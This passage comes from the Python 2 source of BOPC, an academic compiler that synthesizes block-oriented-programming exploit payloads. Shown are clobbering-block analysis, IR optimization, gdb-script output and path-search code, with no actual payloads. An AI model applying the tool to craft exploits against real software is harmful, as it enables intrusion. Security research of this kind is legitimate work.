            # if node.addr != 0x416A66 and node.addr != 0x404eec:
            #       continue

            clob = set()                            # set of clobbering statements

            #
            # Question: Is block B clobbering for statement S?
            #
            # Clobbering blocks are dynamic. Write more...
            #
            try:
                acc = self.__cfg.graph.node[node]['acc']
            except KeyError:
                acc = []


            for stmt in self.__ir:
                #
                # statements 'call', 'cond', 'jump' and 'return' never have clobbering blocks
                # only 'varset', 'regset' and 'regmod' affect the others (like 'call')
                #
                
                # -----------------------------------------------------------------------
                # Statement 'varset'
                #
                # Due to the AWP, all variables are set ahead, so any basic block that 
                # modified any of the reserved memory addreses is a clobbering block
                # -----------------------------------------------------------------------
                if stmt['type'] == 'varset':
                    # print '---------', vmap
                    # for addr, size in abstr['conwr']:
                    for addr, ex in abstr['memwr']:
                        # print addr, ex
                        if addr.shallow_repr() in vmap and vmap[addr.shallow_repr()] == stmt['name']:
                            # block is clobbering
                            print hex(node.addr), 'clob for varset'
                            clob.add(stmt['uid'])
                            fatal('I should come back to that')
                            '''
                            'memwr': set([
                                (<SAO <BV64 0x7fffffffffeffb0>>, <SAO <BV64 0x40f5a5>>), 
                                (<SAO <BV64 0x7fffffffffeffd0>>, <SAO <BV64 r12_48109_64>>), 
                                (<SAO <BV64 0x7fffffffffeffc0>>, <SAO <BV64 rbx_48100_64>>), 
                                (<SAO <BV64 0x7fffffffffeffe8>>, <SAO <BV64 r15_48112_64>>), 
                                (<SAO <BV64 0x7fffffffffeffc8>>, <SAO <BV64 0x7ffffffffff01f0>>), 
                                (<SAO <BV64 0x7fffffffffeffd8>>, <SAO <BV64 r13_48110_64>>), 
                                (<SAO <BV64 0x7fffffffffeffe0>>, <SAO <BV64 r14_48111_64>>)]), 

                            'conwr': set([
                                (576460752303357888L, 64), 
                                (576460752303357896L, 64), 
                                (576460752303357928L, 64), 
                                (576460752303357904L, 64), 
                                (576460752303357872L, 64), 
                                (576460752303357912L, 64), 
                                (576460752303357920L, 64)])}
                            '''
                        # Check rsvp here? (and not during search?) Not sure :\

                        #
                        # TODO: use 'size' and check for overlaps (e.g, vmap is X, but addr is X+1)
                        #


                # -----------------------------------------------------------------------
                # Statement 'regset' or 'regmod'
                #
                # register of 'clob' type are always clobbering
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'regset' or stmt['type'] == 'regmod':
                    #for reg in [r for r in abstr['regwr'].keys() if 1]:
                    for reg in abstr['regwr'].keys():

                       # print reg, stmt, acc

                        # if register is being written and block is not accepted, then it's 
                        # clobbering 
                        if reg in rmap and rmap[reg] == '__r%d' % stmt['reg'] \
                            and stmt['uid'] not in acc:
                        # rmap[reg] != '__r%d' % stmt['reg']:
                                clob.add(stmt['uid'])


                # -----------------------------------------------------------------------
                # Statement 'memrd'                
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'memrd':                    
                    for reg in abstr['regwr'].keys():
                        if reg in rmap and \
                            (rmap[reg] == '__r%d' % stmt['reg'] or \
                             rmap[reg] == '__r%d' % stmt['mem']) \
                             and stmt['uid'] not in acc:
                        
                                clob.add(stmt['uid'])

                
                # -----------------------------------------------------------------------
                # Statement 'memwr'
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'memwr':                    
                    for reg in abstr['regwr'].keys():
                        if reg in rmap and \
                            (rmap[reg] == '__r%d' % stmt['mem'] or \
                             rmap[reg] == '__r%d' % stmt['val'])\
                             and stmt['uid'] not in acc:                        
                                clob.add(stmt['uid'])


                # -----------------------------------------------------------------------
                # Statement 'call'
                #
                # Check dirty registers (optional)
                # -----------------------------------------------------------------------
                elif stmt['type'] == 'call':
                    pass


                # -----------------------------------------------------------------------
                # Other statements
                # -----------------------------------------------------------------------
                else:
                    pass


            # ---------------------------------------------------------------------------
            # In some cases, we have to relax the "clobbering" definition. For instance
            # if we set a register twice, or if when we modify a register (e.g. __r2 -= 1)
            # in an SPL payload, the 2nd assigment will be clobbering for the 1st according
            # to our definition of clobbering blocks. However, we will end up finding no 
            # solution as the 2nd accepted blocks will always be clobbering for
            # the first.
            #
            # Such SPL statements are clobbering by themselves, so we have to go back on
            # the list of clobbering blocks and remove them.
            # ---------------------------------------------------------------------------
            clob_l = list(clob)
            
            for s2 in clob_l:
                for s1 in acc:

                    if self.__is_clobbering(self.__ir[s1], self.__ir[s2]):    
                        clob.remove(s2)                
                        break


            # ---------------------------------------------------------------------------
            # Check dirty registers. 'dirty': ['rax', 'rcx', 'rdx']
            #
            # There will be a single basic block after syscall. Mark it as clobbering for
            #       all registers in 'dirty' list
            #
            # Update: This is not needed at all. If registers/memory gets modified inside
            # the lib/sys call then solution will be discarded by simulation, as these
            # addresses/registers are marked as immutable, so any violation will
            # result in discarding current solution.
            #
            # UPDATE 2: It is fixed :) (check immutable registers / simulation modes)
            # 
            # However, a check here, can be used as an optimization, as we can discard
            # solutions earlier.
            # ---------------------------------------------------------------------------
            if len(clob) > 0:
                dbg_prnt(DBG_LVL_4, "Block 0x%x (%d/%d) is clobbering for statement(s): %s" %
                                     (node.addr,  counter, nnodes, # pretty_list(clob, ', ', dec)))                
                                                         ', '.join(sorted(map(str, clob)))) )
                
                self.__cfg.graph.node[node]['clob'] = clob
                
                for c in clob:          
                    clobbering.setdefault(c, []).append(node.addr)


            counter += 1


        dbg_prnt(DBG_LVL_1, "Done.")

        # print clobbering
        # print self.rsvp
        # exit()

        return clobbering


    # ---------------------------------------------------------------------------------------------
    # __get_stmt_regs(): This function gets all registers that are being used in a statement.
    #
    # :Arg stmt: The statement to get registers from.
    # :Ret: A list of all registers (int) that are being used by the statemet
    
    def __get_stmt_regs( self, stmt ):
        if   stmt['type'] == 'regset': return [stmt['reg']]
        elif stmt['type'] == 'regmod': return [stmt['reg']]
        elif stmt['type'] == 'memrd' : return [stmt['reg'], stmt['mem']]
        elif stmt['type'] == 'memwr' : return [stmt['mem'], stmt['val']]
        elif stmt['type'] == 'call'  : return [] # stmt['args']
        elif stmt['type'] == 'cond'  : return [stmt['reg']]
        else:
            return []


    # ---------------------------------------------------------------------------------------------
    # __is_clobbering(): Check whether SPL statement s2 is clobbering for SPL statement s1.
    #
    # :Arg s1: The first SPL statement
    # :Arg s2: The second SPL statement
    # :Ret: If statement s2 is clobbering with statement s1 function returns True. Otherwise it
    #       returns False.
    #       
    def __is_clobbering( self, s1, s2 ):   
        # TODO: That's not totally correct for complex SPL payloads, but it works for now
        #
        #        if  (s1['type'] == 'regset' or s1['type'] == 'regmod') and \
        #            (s2['type'] == 'regset' or s2['type'] == 'regmod'):
        #                if s1['reg'] == s2['reg']:
        #                    return True
        #
        # TODO: Add statements for memrd/memwr!!! IMPORTANT!!!

        s1_regs = set(self.__get_stmt_regs(s1))
        s2_regs = set(self.__get_stmt_regs(s2))


        if (s1_regs & s2_regs): # and s2['uid'] > s1['uid']:
            return True

        return False

# -------------------------------------------------------------------------------------------------


================================================
FILE: source/optimize.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# optimize.py
#
# This module performs several optimizations to the generated IR that aim to increase the chances
# of finding a trace (for the given IR) on the target CFG.
#
# -------------------------------------------------------------------------------------------------
from coreutils import *

import compile  as C
import calls
import networkx as nx
import itertools
import struct
import copy


# -------------------------------------------------------------------------------------------------
# optimize: This is the main class (derived from "compile") that optimizes the generated IR.
#
class optimize( C.compile ):
    ''' ======================================================================================= '''
    '''                                   INTERNAL FUNCTIONS                                    '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __get_stmt_regs(): This function gets all registers that are being used in a statement.
    #
    # :Arg stmt: The statement to get registers from.
    # :Ret: A list of all registers (int) that are being used by the statemet
    
    def __get_stmt_regs( self, stmt ):
        if   stmt['type'] == 'varset': return []
        elif stmt['type'] == 'regset': return [stmt['reg']]
        elif stmt['type'] == 'regmod': return [stmt['reg']]
        elif stmt['type'] == 'memrd' : return [stmt['reg'], stmt['mem']]
        elif stmt['type'] == 'memwr' : return [stmt['mem'], stmt['val']]
        elif stmt['type'] == 'call'  : return stmt['args']
        elif stmt['type'] == 'cond'  : return [stmt['reg']]
        else:
            return []


    # ---------------------------------------------------------------------------------------------
    # __depends(): This function checks whether statement s2 depends on statement s1. Dependencies
    #       occur at the registers and they are defined as follows:
    #           [0]. entry  -> *            (depends on everything)
    #           [1]. varset -> varset 
    #           [2]. regset -> regset / varset
    #           [3]. regmod -> regset / memrd
    #           [4]. memrd  -> regset / regmod
    #           [5]. memwr  -> regset / regmod / memrd
    #           [6]. call   -> regset / regmod / memrd
    #           [7]. cond   -> regset / regmod / memrd
    #           [8]. *      -> return       (everything depends on it)
    #
    # :Arg s1: First statement
    # :Arg s2: Second statement
    # :Ret: True if s2 depends on s1. False otherwise.
    #
    def __depends( self, s1, s2 ):
        s1_regs = set(self.__get_stmt_regs(s1))
        s2_regs = set(self.__get_stmt_regs(s2))


        # ---------------------------------------------------------------------
        # Case 0: Check whether s1 is the entry (pseudo)statement (and avoid cycles)
        if s1['type'] == 'entry' and s2['type'] != 'entry':
            return True


        # ---------------------------------------------------------------------
        # Case 1: Check whether any of the reference names matches
        elif s1['type'] == 'varset' and s2['type'] == 'varset':
            for val in s2['val']:                
                if isinstance(val, tuple) and val[0] == s1['name']:           
                    return True                     # yes, it depends


        # ---------------------------------------------------------------------
        # Case 2: Check whether any of the reference names matches
        elif s1['type'] == 'varset' and s2['type'] == 'regset':
            if isinstance(s2['val'], tuple):
                for val in s1['val']:               # value dependency
                    if isinstance(val, tuple) and val[0] == s2['val'][0]:
                        return True

                if s1['name'] in s2['val'][0]:      # name dependency
                    return True
        

        # ---------------------------------------------------------------------
        # Case 8: Check whether s2 is the return (pseudo)statement (and avoid cycles)
        elif s1['type'] != 'return' and s2['type'] == 'return':
            return True


        # ---------------------------------------------------------------------
        # Other Cases: Check whether register matches and s2 assigment happens
        #       *after* s1 (we can compare UIDs as we're within a group).
        elif (s1_regs & s2_regs) and s2['uid'] > s1['uid']:
            return True


        # ---------------------------------------------------------------------
        # Case 7: These are already handled, as conditional statements are not
        #       moving. Furthermore. semantic analysis has already taken care
        #       of it.

     
        return False                                # statements are independent


    # ---------------------------------------------------------------------------------------------
    # __ooo_intrl(): This is the internal function that performs the actual rearrangement of the
    #       statements. It first builds the dependence graph for the statements and then it uses
    #       a modified version of Kahn's topological sorting algorithm, to find which statements
    #       can be executed out of order. These statements are packed in the same list, so each
    #       IR statement now contains a list of statements.
    #
    # :Arg stmt_l: A list of statements to make out of order
    # :Ret: A new list with out of order statements
    #
    def __ooo_intrl( self, stmt_l ):
        if len(stmt_l) == 0: return []              # base check

        G = nx.DiGraph()                            # create a directed graph
        for s in stmt_l: G.add_node( s[0] )

        # At this point, IR has passed the semantic checks so a statement only depends on the
        # statements above it. Therefore we only care about distinct pairs (i,j).
        for i in range(0, len(stmt_l)):
            for j in range(0, len(stmt_l)):
                si = stmt_l[i]
                sj = stmt_l[j]

                if i == j:                          # a statement can't depend on itself
                    continue

                # print self.__depends(si[1][0], sj[1][0]), si[1][0], sj[1][0]
                if self.__depends(si[1][0], sj[1][0]):
                    G.add_edge( sj[0], si[0])       # if j depends on i, then add an edge


        # Now, use a modified version of Kahn's topological sorting algorithm to find out the 
        # out of order statements. At each step we extract all nodes (statements) with no
        # incoming edges and we bucket them together (these statements can be executed in any 
        # order). Then we remove these nodes (along with their edges) and we repeat, until 
        # graph becomes empty.
        # 
        # Each statement from the 2nd set depends on some statement from the 1st set and therefore,
        # it must be executed _after_ all statements from previous set.
        new_l = []                                  # ooo list
        
        dbg_arb(DBG_LVL_3, "Dependence Graph edges:", G.edges())

        while len(G) > 0:                           # while there are nodes in the dependence graph
            tG     = G.copy()                       # get a temporary copy of the graph
            stmt   = ['@__', []]                    # initialize next statement
            min_pc = INFINITY                       # min PC (start with a huge value)


            # for each node with no incoming edges
            for n in [n for n in tG.nodes() if tG.in_degree(n) == 0]:
                G.remove_node(n)                    # remove node 
                                                    # (and all adjacent edges from original graph)
                # keep track of the minimum pc
                min_pc = int(n[3:]) if int(n[3:]) < min_pc else min_pc

                # append statement to the ooo list
                stmt[1].append([s[1][0] for s in stmt_l if s[0] == n][0])

            # A jcc will jump to the first instruction of the ooo statements, so we need the min pc
            stmt[0] = stmt[0] + str(min_pc)         # update pc

            new_l.insert(0, stmt)                   # append list of statement to the new list

        return new_l                                # return that list


    # ---------------------------------------------------------------------------------------------
    # __ooo(): This optimization finds which statements can be executed out of order. By allowing 
    #       two statements to be executed out of order, we make our trace searching algorithm more 
    #       flexible, thus giving it more chances to succeed.
    #
    #       However, if we rearrange a label or a jump statement, or if we move a statement at a 
    #       different scope of a label or jump, then we'll destroy payload's execution flow. 
    #       Therefore, we fix labels and conditional jumps at their positions and we only rearrange
    #       the statements that are between them (so, we use labels and jumps as _delimiters_; this
    #       is why we need labels in the IR at this point)
    #
    # :Ret: None.
    #
    def __ooo( self  ):
        dbg_prnt(DBG_LVL_2, "Searching for Out-Of-Order statements...")
        jumps     = ['cond', 'jump']
        oldir     = copy.deepcopy(self.__ir)        # take a backup of original IR
        self.__ir = []
        cstmt_l   = []                              # current statement list


        for stmt in oldir:                          # for each statement
            s = stmt[1][0]                          # get the core statement (no ooo yet)

            if s['type'] == 'label' or s['type'] in jumps:  # we have hit a delimiter. Slice.

                # make statements out of order (also put conditional back to IR)
                self.__ir = self.__ir + self.__ooo_intrl(cstmt_l) + \
                            ([stmt] if s['type'] in jumps else [])

                cstmt_l   = []                      # clear current list

            else: cstmt_l.append(stmt)              # append any statement to current list


        if cstmt_l:                                 # do not forget the leftovers (if any)
            self.__ir += self.__ooo_intrl(cstmt_l)

        del oldir                                   # free memory

        dbg_prnt(DBG_LVL_2, "Done.")


    # ---------------------------------------------------------------------------------------------
    # __label_remove(): In case that __ooo is not invoked, we should remove the labels from the IR.
    #
    # :Ret: None.
    #
    def __label_remove( self ):
        dbg_prnt(DBG_LVL_2, "Removing labels...")

        oldir     = copy.deepcopy( self.__ir )      # no ooo => 1 tuple per IR entry
        self.__ir = []

        for stmt in oldir:                          # for each statement
            # if we have a LABEL (no ooo yet), don't copy it to the new list
            if stmt[1][0]['type'] != 'label': self.__ir.append( stmt )

        del oldir                                   # free memory

        dbg_prnt(DBG_LVL_2, "Done.")


    # ---------------------------------------------------------------------------------------------
    # __rewrite(): This optimization rewrites some function calls from equivalent groups. Thus,
    #       it increases the likelihood of finding a solution (e.g., when puts() is not available,
    #       BOPC searches for print()).
    #
    # :Ret: None.
    #
    def __rewrite( self ):
        dbg_prnt(DBG_LVL_2, "Rewriting library and system calls...")

        for stmt in self.__ir :                     # for each statement            
            if stmt[1][0]['type'] == 'call': 
            
                for group in calls.call_groups__:
                    name = stmt[1][0]['name']

                    if name in group:
                        stmt[1][0]['alt'] = [f for f in group if f != name]

        dbg_prnt(DBG_LVL_2, "Done.")

        error("Rewrite optimiazation is incomplete")


    # ---------------------------------------------------------------------------------------------
    # __future(): This function is reserved for future optimizations. 
    #
    # :Ret: None.
    #
    def __future( self ):
        warn("Add future optimizations...")


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor.
    #
    # :Ret: A class object.
    #
    def __init__( self, ir ):
        self.__ir = ir                              # IR to optimize

        super(self.__class__, self).__init__('')    # invoke base class constructor


    # ---------------------------------------------------------------------------------------------
    # __getitem__(): Get i-th statement from IR. Out-of-order statements are groups in the same 
    #       list entry, so we cannot find them in O(1) without an auxiliary data struct. For now,
    #       we simply perform a linear search.
    #
    #       This function overloads compile.__getitem__()
    #
    # :Arg idx: Index of the IR statement
    # :Ret: The requested IR statement
    # 
    def __getitem__( self, idx ):
        assert( idx >= 0 )                          # bounds checks

        for _, stmt_r in self.__ir:                 # for each IR statement list
            for stmt in stmt_r:                     # for each "parallel" statement
                if stmt['uid'] == idx: return stmt  # if index found return statement

        raise IndexError("No statement with uid = %d found" % idx )
        # return []                                 # failure. Statement not found


    # ---------------------------------------------------------------------------------------------
    # optimize(): Optimize the generated IR
    #
    # :Arg mode: Mode that optimizer should operate on.
    # :Ret: None.
    #
    def optimize( self, mode ):
        dbg_prnt(DBG_LVL_1, "Optimizer started. Mode: '%s'" % mode)

        try:
            # Each optimization mode, executes some functions. Based on the mode execute the 
            # appropriate sequence of functions.
            for opt in {
                'none'    : [self.__label_remove],
                'ooo'     : [self.__ooo],
                'rewrite' : [self.__rewrite],
                'full'    : [self.__ooo, self.__future]
            }[ mode ]: opt()

        except KeyError: 
            fatal("Invalid mode '%s'" % mode )      # invalid mode

        dbg_prnt(DBG_LVL_1, "Optimization completed.")


        self._calc_stats()                          # re-calculate statistics

        # At this point we can make IR immutable, as we won't make any changes to it.

        dbg_prnt(DBG_LVL_2, 'Optimized IR:')

        for pc, group in self.__ir:                 # print optimized IR
            dbg_prnt(DBG_LVL_2, '%s %s %s' % ('-'*32, pc, '-'*32))
            
            for stmt in group:
                dbg_arb(DBG_LVL_2, '', stmt)


    # ---------------------------------------------------------------------------------------------
    # itergroup(): Iterate over all group statements.
    #
    # :Ret: Every time function returns a different group of statement.
    # 
    def itergroup( self ):        
        for _, stmt_r in self.__ir:                 # for each IR statement list
            yield stmt_r                            # return next statement


    # ---------------------------------------------------------------------------------------------
    # get_ir(): Return the compiled IR.
    #
    # :Ret: The IR.
    #
    def get_ir( self ):
        return self.__ir


    # ---------------------------------------------------------------------------------------------
    # emit(): Emit IR and save it into a file
    #
    # :Ret: None.
    #
    def emit( self, filename ):
        dbg_prnt(DBG_LVL_1, "Writing SPL IR to a file...")    
         
        try:    
            file = open(filename + '.ir', 'w')

            for pc, stmt_l in self.__ir:
                for stmt in stmt_l:
                    opt  = '%s %s ' % (pc, stmt['type'])

                    # -------------------------------------------------------------------
                    if stmt['type'] == 'varset':
                        opt += '%s ' % stmt['name']
                        
                        for val in stmt['val']:
                            if isinstance(val, tuple): 
                                opt += 'var %s ' % val[0]
                            else:                      
                                if len(val) != 8:
                                    for i in range(0, len(val), 8):
                                        opt += 'num %s ' % val[i:i+8].encode("hex")
                                        print val[i:i+8],val[i:i+8].encode("hex")
                                else:
                                    opt += 'num %s ' % val.encode("hex")
                    # -------------------------------------------------------------------
                    elif stmt['type'] == 'regset':
                        opt += '%d %s ' % (stmt['reg'], stmt['valty'])
                        if stmt['valty'] == 'num': opt += '%d' % stmt['val']
                        else:                      opt += '%s' % stmt['val'][0]

                    # -------------------------------------------------------------------
                    elif stmt['type'] == 'regmod':
                        opt += '%d %c %d' % (stmt['reg'], stmt['op'], stmt['val'])

                    # -------------------------------------------------------------------
                    elif stmt['type'] == 'memrd':
                        opt += '%d %d' % (stmt['reg'], stmt['mem'])

                    # -------------------------------------------------------------------
                    elif stmt['type'] == 'memwr':
                        opt += '%d %d' % (stmt['mem'], stmt['val'])

                    # -------------------------------------------------------------------
                    elif stmt['type'] == 'label':
                        pass

                    # -------------------------------------------------------------------
                    elif stmt['type'] == 'call':
                        # dirty is not used at all
                        opt += '%s %s' % (stmt['name'], ' '.join('%d' % a for a in stmt['args']))

                    # -------------------------------------------------------------------
                    elif stmt['type'] == 'cond':
                        opt += '%d %s %d %s' % (stmt['reg'], stmt['op'], stmt['num'], stmt['target'])

                    # -------------------------------------------------------------------
                    elif stmt['type'] == 'jump':
                        opt += '%s' % stmt['target']

                    # -------------------------------------------------------------------
                    elif stmt['type'] == 'return':
                        # dirty is not used at all
                        opt += '%x' % stmt['target']


                    file.write( "%s\n" % opt )
                       
            file.close()
           
            dbg_prnt(DBG_LVL_1, "Done. SPL IR saved as %s" % filename + '.ir')

        except IOError, err:
            fatal("Cannot create file: %s" % str(err))    

# -------------------------------------------------------------------------------------------------


================================================
FILE: source/output.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# output.py:
#
# This module deal with the representation of the solution.
#
#
# * * * ---===== TODO list =====--- * * *
#
# [1]. Support the other formats (right now only 'gdb' is supported). To do that, make all 
#      functions dispatchers, that invoke internal ones (e.g., register() will use self.__format to
#      choose between __gdb_register(), __idc_register() or __raw_register()).
#
# -------------------------------------------------------------------------------------------------
from coreutils import *
import time


# -------------------------------------------------------------------------------------------------
# output: This class transforms the solution into the appropriate format and dumps it into a file.
#
class output( object ):
    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor. 
    #
    # :Arg format: The format to use
    #
    def __init__( self, fmt ):
        self.__format = fmt                         # current formate
        self.__output = ''                          # the final output string


        # check if format is valid
        if self.__format not in ['raw', 'gdb', 'idc']:
            fatal("Unknown format '%s'" % self.__format)
        
        if self.__format != 'gdb':
            fatal("Format '%s' is not implemented" % self.__format)


    # ---------------------------------------------------------------------------------------------
    # comment(): Add a comment to the output file.
    #
    # :Arg comment: Comment to add
    # :Ret: None.
    # 
    def comment( self, comment ):
        self.__output += '# %s\n' % comment


    # ---------------------------------------------------------------------------------------------
    # newline(): Simply add a blank newline.
    #
    # :Ret: None.
    # 
    def newline( self ):
        self.__output += '\n'


    # ---------------------------------------------------------------------------------------------
    # breakpoint(): Add a breakpoint to the output file.
    #
    # :Arg address: Address of the breakpoint
    # :Ret: None.
    # 
    def breakpoint( self, address ):
        self.__output += 'break *0x%x\n' % address


    # ---------------------------------------------------------------------------------------------
    # register(): Set a register.
    #
    # :Arg register: Register to set
    # :Arg value: Value to write (8 bytes)
    # :Ret: None.
    # 
    def register( self, register, value, comment='' ):        
        self.__output += 'set $%s = %s' % (register, value)

        if comment: 
            self.__output += '\t# ' + comment

        self.__output += '\n'


    # ---------------------------------------------------------------------------------------------
    # memory(): Write to memory.
    #
    # :Arg address: Address to write
    # :Arg value: Value that is being written
    # :Arg size: Size of the value
    # :Ret: None.
    # 
    def memory( self, address, value, size ):
        if size == 8 and value[0] != '{':
            cast = '(long long int)'
        else:
            cast = ''

        self.__output += 'set {char[%d]} (%s) = %s %s\n' % (size, address, cast, value)        


    # ---------------------------------------------------------------------------------------------
    # external(): External input (from socked, file, etc.)
    #
    # :Arg line: -
    # :Ret: None.
    # 
    def external( self, line ):
        fatal('output.external() is not implemented yet')


    # ---------------------------------------------------------------------------------------------
    # alloc(): Allocate some contigouous memory (pool).
    #
    # :Arg varname: Pool name
    # :Arg size: Pool size
    # :Ret: None.
    # 
    def alloc( self, varname, size ):
        self.__output += 'set %s = malloc(%d)\n' % (varname, size)


    # ---------------------------------------------------------------------------------------------
    # set(): Set a variable.
    #
    # :Arg name: Variable name
    # :Arg value: Variable's desired value
    # :Ret: None.
    # 
    def set( self, name, value ):
        self.__output += 'set %s = %s \n' % (name, value)


    # ---------------------------------------------------------------------------------------------
    # save(): Save the current output to a file.
    #
    # :Arg binary: Binary file name
    # :Ret: None.
    # 
    def save( self, binary ):
        now    = datetime.datetime.now()            # get current timestamp
        banner = textwrap.dedent("""\
            #
            # This file has been created by BOPC at: %s
            # 
        """ % now.strftime("%d/%m/%Y %H:%M"))       # create a banner


        # make sure that file has a unique name, as we can have >1 solutions
        filename = '%s_%x.%s' % (binary, time.time(), self.__format)

        try:    
            out = open(filename, 'w')               # create file

            out.write(banner)                       # write banner first
            out.write(self.__output)                # then output
            out.close()
           
            dbg_prnt(DBG_LVL_1, "Solution has saved as '%s'" % bolds(filename))
            dbg_prnt(DBG_LVL_2, "Solution file:\n%s" % banner + self.__output)


            dbg_prnt(DBG_LVL_2, "Waiting for a second to prevent solutions with the same timestamp...")
            time.sleep(1)                           # prevent solutions with the same filename
            
        except IOError, err:
            error("Cannot create output file: %s" % str(err))


# -------------------------------------------------------------------------------------------------


================================================
FILE: source/path.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# path.py:
#
# This module is the "assistant" of the Symbolic Execution engine. Clearly, the unrestricted usage
# of symbolic execution can cause BOPC to run for ever (bottleneck). To address this problem,
# we aim to restrict the Symbolic Execution as much as possible. So, instead of letting Symbolic
# Execution engine to use it's build-in BFS for the path exploration, we find out (i.e., guess) the
# exact path(s) and we _guide_ the Symbolic Execution engine to strictly follow them. Therefore, we
# avoid the exponential growth of the states.
#
# In case that the recommended path does not work out (due to the unsatisfiable constraints), we
# need to try another path and so on. In the worst case we will try all the paths and the result
# will be the same with the unguided Symbolic Execution. Having a way to quickly generate candidate
# paths is crucial here.
#
# The trick here is to "rank" the paths, starting from the one which is more likely to succeed. A
# good metric here is the path length in the CFG (shortest paths in CFG are not like shortest paths
# in normal graphs, due to the context sensitivity). Therefore, we start with the shortest path
# first, then we move on the second shortest path and so on.
#
#
# * * * ---===== TODO list =====--- * * *
#
# [1]. Implement Lawler's modification in k_shortest_paths() to avoid duplicates (or ue Eppstein's
#      algorithm to deal with looping paths).
#
# -------------------------------------------------------------------------------------------------
from coreutils import *

import networkx as nx
import queue
import heapq
import traceback


# ------------------------------------------------------------------------------------------------
# Constant Definitions
# ------------------------------------------------------------------------------------------------
_NULL_NODE   = -1                                   # null (non-existent) node
_SINK_NODE   = 0                                    # the sink node in delta graph


# -------------------------------------------------------------------------------------------------
# _queue_obj: This class is the wrapper object that is used in the priority queue.
#
class _queue_obj( object ):
    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor. Simply initialize class members.
    #
    # :Arg data: Object's data
    # :Arg weight: Object's weight (used for the comparisons)
    #
    def __init__( self, data, weight ):
        self.weight = weight
        self.data   = data


    # ---------------------------------------------------------------------------------------------
    # __cmp__(): Overloaded operator for object comparison.
    #
    # :Arg other: The other object to compare.
    # :Ret: Function retuns a <0 value if self.weight < other.weight, 0 if 
    #       self.weight == other.weight and a >0 value if self.weight > other.weight.
    #
    def __cmp__( self, other ):
        return cmp(self.weight, other.weight)


# -------------------------------------------------------------------------------------------------


# -------------------------------------------------------------------------------------------------
# _cs_ksp_intrl: This class finds the k shortest context sensitive loopless paths with non-negative
#   edge costs from a single source to a single destination using Yen's algorithm as described in
#   [1]. Algorithm first finds the shortest paths (using any of the well known  algorithms) and 
#   then it finds K-1 deviations of the shortest path.
#
#   The problem here, is that shortest paths are CFG shortest paths and therefore they are context
#   sensitive. Thus we have to modify the existing algorithm. TODO: rewrite
#
#
# [1]. Yen, Jin Y. "Finding the k shortest loopless paths in a network." management Science 
#       17.11 (1971): 712-716.
#
class _cs_ksp_intrl( object ):
    ''' ======================================================================================= '''
    '''                                   INTERNAL FUNCTIONS                                    '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __get_precall_stack(): This function calculates the "precall" stack for a given node in a
    #       path. The precall stack is like the regular call stack, but instead of storing the
    #       return address for every function call, it stores the caller's address (we do this as
    #       it's more convenient to work with). Precall stack is the "context" of the current node.
    #
    # :Arg path: A path as a list
    # :Arg node: The given node to retrieve pre-call stack for
    # :Ret: The pre-call stack for the given node.
    #
